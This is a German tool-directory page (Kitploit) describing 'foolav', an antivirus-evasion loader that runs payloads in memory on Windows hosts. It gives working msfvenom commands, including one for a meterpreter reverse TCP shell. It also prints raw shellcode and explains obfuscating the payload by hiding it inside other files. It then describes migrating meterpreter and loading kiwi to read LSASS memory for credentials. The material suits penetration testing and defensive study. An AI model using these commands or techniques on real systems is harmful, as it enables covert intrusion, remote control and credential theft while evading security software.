Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
foolav — Pentest-Tool zur Antivirus-Umgehung und Ausführung beliebiger Payloads auf einem Ziel-Wintel-Host | Kitploit
Tools/GitHubGitHub/hvqzao/foolav
PenetrationstestsRed Teaming
GitHubhvqzao/foolav

foolav

Pentest-Tool zur Antivirus-Umgehung und Ausführung beliebiger Payloads auf einem Ziel-Wintel-Host

Repository anzeigen
17345vor 10 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

foolav

Ein mit diesem Code kompilierter Executable ist während Penetrationstests nützlich, wenn ein Payload (vielleicht meterpreter?) ausgeführt werden muss, während sichergestellt ist, dass er nicht von Antivirensoftware erkannt wird. Die einzige Anforderung ist, zwei Dateien hochladen zu können: binary executable und payload file in dasselbe Verzeichnis.

Verwendungsschritte

  1. Bereite deinen Payload (x86) vor, z.B.

    calc: msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (du musst nicht unbedingt einen Encoder oder Zeichen-Blacklist verwenden, es wird trotzdem funktionieren)

    meterpreter: msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

  2. Kopiere die Payload-Datei [executable-name-without-exe-extension].mf in dasselbe Verzeichnis wie die Executable. Payload, der calc.exe ausführt, generiert mit obigem Befehl:

    root@kitploit:~
    # calc.exe
    \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84
    
  3. Sobald die Executable ausgeführt wird, wird die Payload-Datei geparst, in einen separaten Thread geladen und im Arbeitsspeicher ausgeführt:

    screen

Hinweise

  • x86-Binaries laufen sowohl auf x86- als auch auf x86_64-Windows-Systemen. Du musst aber trotzdem Payloads der x86-Architektur verwenden. Jedoch kann der x86-Meterpreter-Payload zu x86_64-Prozessen migriert werden. Danach lädt load kiwi die x86_64-Version und ermöglicht den Zugriff auf die interessanten Inhalte des LSASS-Prozessspeichers :)

    meter

  • Die .mf-Payload-Datei kann verschleiert werden – der Parser ignoriert alle Zeichen außer hexadezimalen Sequenzen wie \xHH. Das bedeutet, dass er deinen Payload an fast jede Datei anhängen, zwischen Zeilen verstecken oder sogar eigene Kommentare hinzufügen kann, Beispiel:

obfuscation

Download

https://github.com/hvqzao/foolav/releases/download/v1.0/foolav.zip

Lizenz

MIT License

Tool herunterladen